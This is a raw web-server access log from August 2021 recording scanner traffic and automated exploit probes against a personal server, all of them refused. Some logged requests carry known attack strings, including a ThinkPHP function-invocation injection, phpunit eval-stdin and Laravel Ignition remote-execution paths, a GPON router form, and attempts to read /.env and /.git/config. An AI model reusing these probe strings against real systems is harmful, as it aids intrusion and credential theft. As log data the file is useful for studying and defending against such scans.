5.8.10.202] [Length 252] [Gzip -] "fasthttp" "-" [21/Aug/2021:03:18:36 +0000] 444 - GET https 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [21/Aug/2021:03:18:37 +0000] 400 - GET http 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [21/Aug/2021:03:18:37 +0000] 444 - GET https 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [21/Aug/2021:03:18:37 +0000] 400 - GET http 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [21/Aug/2021:03:18:46 +0000] 444 - GET https 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [21/Aug/2021:03:18:46 +0000] 400 - GET http 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [21/Aug/2021:03:18:47 +0000] 444 - GET https 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [21/Aug/2021:03:18:47 +0000] 400 - GET http 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [21/Aug/2021:04:38:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 216.218.206.69] [Length 0] [Gzip -] "-" "-" [21/Aug/2021:04:57:31 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [21/Aug/2021:06:28:21 +0000] 444 - GET https whoami.moralanimal.net "/.git/config" [Client 23.129.64.157] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [21/Aug/2021:06:49:28 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [21/Aug/2021:07:27:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.120.14.59] [Length 0] [Gzip -] "-" "-" [21/Aug/2021:07:27:11 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.59] [Length 252] [Gzip -] "-" "-" [21/Aug/2021:07:27:11 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.59] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [21/Aug/2021:07:50:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.60] [Length 0] [Gzip -] "-" "-" [21/Aug/2021:07:50:09 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.60] [Length 252] [Gzip -] "-" "-" [21/Aug/2021:07:50:09 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.60] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [21/Aug/2021:08:16:38 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Aug/2021:08:16:39 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Aug/2021:08:16:40 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Aug/2021:08:16:42 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Aug/2021:08:16:44 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [21/Aug/2021:08:16:45 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Aug/2021:08:16:46 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Aug/2021:08:16:47 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Aug/2021:08:16:50 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Aug/2021:08:16:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Aug/2021:08:16:52 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Aug/2021:10:22:53 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.196.153] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Aug/2021:10:59:55 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 185.222.59.20] [Length 0] [Gzip -] "curl/7.3.2" "-" [21/Aug/2021:16:03:41 +0000] 444 - GET https pop.moralanimal.net "/" [Client 61.135.15.179] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 9.0; MI 10 Build/123012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36" "-" [21/Aug/2021:16:59:53 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.219.52] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Aug/2021:17:01:17 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Aug/2021:17:01:17 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Aug/2021:17:01:17 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Aug/2021:17:01:17 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Aug/2021:17:01:17 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Aug/2021:17:01:17 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Aug/2021:17:13:00 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.218.207] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Aug/2021:17:15:15 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.195.245] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Aug/2021:17:22:48 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.198.104] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Aug/2021:18:08:23 +0000] 444 - GET https imap.moralanimal.net "/" [Client 144.86.173.75] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [21/Aug/2021:18:51:20 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.202.9] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Aug/2021:18:52:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Aug/2021:19:08:21 +0000] 444 - GET https imap.moralanimal.net "/" [Client 92.118.160.1] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [21/Aug/2021:20:11:25 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.551.0 Safari/534.10" "-" [21/Aug/2021:20:11:25 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0" "-" [21/Aug/2021:20:28:54 +0000] 444 - GET https router.moralanimal.net "/" [Client 61.135.15.137] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 9.0; LG G2 Build/012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4472.114 Mobile Safari/537.36 Edg/97" "-" [21/Aug/2021:21:23:23 +0000] 444 - GET https 64.22.31.253 "/static/config/static_js.php" [Client 193.46.254.155] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36" "-" [21/Aug/2021:21:58:28 +0000] 400 - GET https localhost "/" [Client 161.35.188.242] [Length 154] [Gzip -] "-" "-" [21/Aug/2021:23:09:14 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.200.152] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Aug/2021:00:07:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Aug/2021:03:31:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.195.144] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Aug/2021:04:00:21 +0000] 444 - GET https 64.22.31.253 "/web/index.html" [Client 92.118.160.1] [Length 0] [Gzip -] "Go http package" "-" [22/Aug/2021:04:26:06 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:04:26:08 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:04:26:11 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:04:26:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:04:26:12 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:04:26:14 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [22/Aug/2021:04:26:14 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:04:26:14 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:04:26:17 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:04:26:17 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:04:26:19 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:05:14:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.139.69] [Length 0] [Gzip -] "-" "-" [22/Aug/2021:05:48:32 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 185.222.59.20] [Length 0] [Gzip -] "curl/7.3.2" "-" [22/Aug/2021:05:52:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.156] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [22/Aug/2021:05:52:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.199.111.57] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [22/Aug/2021:05:52:21 +0000] 444 - OPTIONS https localhost "/" [Client 185.220.101.144] [Length 0] [Gzip -] "-" "-" [22/Aug/2021:05:52:22 +0000] 444 - OPTIONS https localhost "/" [Client 204.8.156.142] [Length 0] [Gzip -] "-" "-" [22/Aug/2021:05:52:24 +0000] 400 - - https localhost "-" [Client 23.129.64.151] [Length 154] [Gzip -] "-" "-" [22/Aug/2021:05:52:24 +0000] 400 - - https localhost "-" [Client 23.129.64.154] [Length 154] [Gzip -] "-" "-" [22/Aug/2021:05:52:26 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 45.153.160.134] [Length 0] [Gzip -] "-" "-" [22/Aug/2021:05:52:26 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.154] [Length 0] [Gzip -] "-" "-" [22/Aug/2021:06:09:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Aug/2021:07:33:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 94.102.56.151] [Length 0] [Gzip -] "libwww-perl/6.45" "-" [22/Aug/2021:07:33:23 +0000] 400 - GET http 64.22.31.253 "/" [Client 94.102.56.151] [Length 252] [Gzip -] "libwww-perl/6.45" "-" [22/Aug/2021:07:35:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Aug/2021:10:23:03 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.206.6] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Aug/2021:10:37:43 +0000] 444 - GET https komga.moralanimal.net "/" [Client 218.17.86.55] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10.0; LG G2 Build/170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4472.114 Mobile Safari/537.36" "-" [22/Aug/2021:11:30:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Aug/2021:12:49:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Aug/2021:13:07:21 +0000] 400 - GET http localhost "/" [Client 143.198.235.243] [Length 252] [Gzip -] "-" "-" [22/Aug/2021:16:55:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 178.32.197.88] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0" "-" [22/Aug/2021:17:01:07 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:17:01:08 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:17:01:09 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:17:01:09 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:17:01:10 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:17:01:12 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [22/Aug/2021:17:01:12 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:17:01:13 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:17:01:14 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:17:01:15 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:17:01:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Aug/2021:17:01:23 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Aug/2021:17:01:23 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Aug/2021:17:01:23 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Aug/2021:17:01:23 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Aug/2021:17:01:23 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Aug/2021:17:01:23 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Aug/2021:17:02:02 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.218.116] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Aug/2021:17:23:22 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.221.138] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Aug/2021:19:07:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Aug/2021:19:12:20 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.205.211] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Aug/2021:19:27:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Aug/2021:21:08:16 +0000] 400 - GET http 64.22.31.253 "/manager/text/list" [Client 192.241.221.138] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Aug/2021:21:15:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.120.14.41] [Length 0] [Gzip -] "-" "-" [22/Aug/2021:21:15:49 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.41] [Length 252] [Gzip -] "-" "-" [22/Aug/2021:21:15:49 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.41] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [22/Aug/2021:21:53:05 +0000] 400 - GET http localhost "/recordings/theme/main.css" [Client 77.247.108.42] [Length 154] [Gzip -] "gbrmss/7.29.0" "-" [22/Aug/2021:22:31:55 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 137.184.11.91] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [22/Aug/2021:23:10:55 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.205.39] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Aug/2021:23:39:07 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 185.222.59.20] [Length 0] [Gzip -] "curl/7.3.2" "-" [22/Aug/2021:23:41:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.113] [Length 0] [Gzip -] "-" "-" [22/Aug/2021:23:41:57 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.113] [Length 252] [Gzip -] "-" "-" [22/Aug/2021:23:41:57 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.113] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [23/Aug/2021:00:06:57 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 192.241.194.190] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Aug/2021:00:55:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 216.218.206.68] [Length 0] [Gzip -] "-" "-" [23/Aug/2021:02:14:13 +0000] 400 - GET http localhost "/" [Client 106.15.121.161] [Length 154] [Gzip -] "-" "-" [23/Aug/2021:03:29:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.200.129] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" 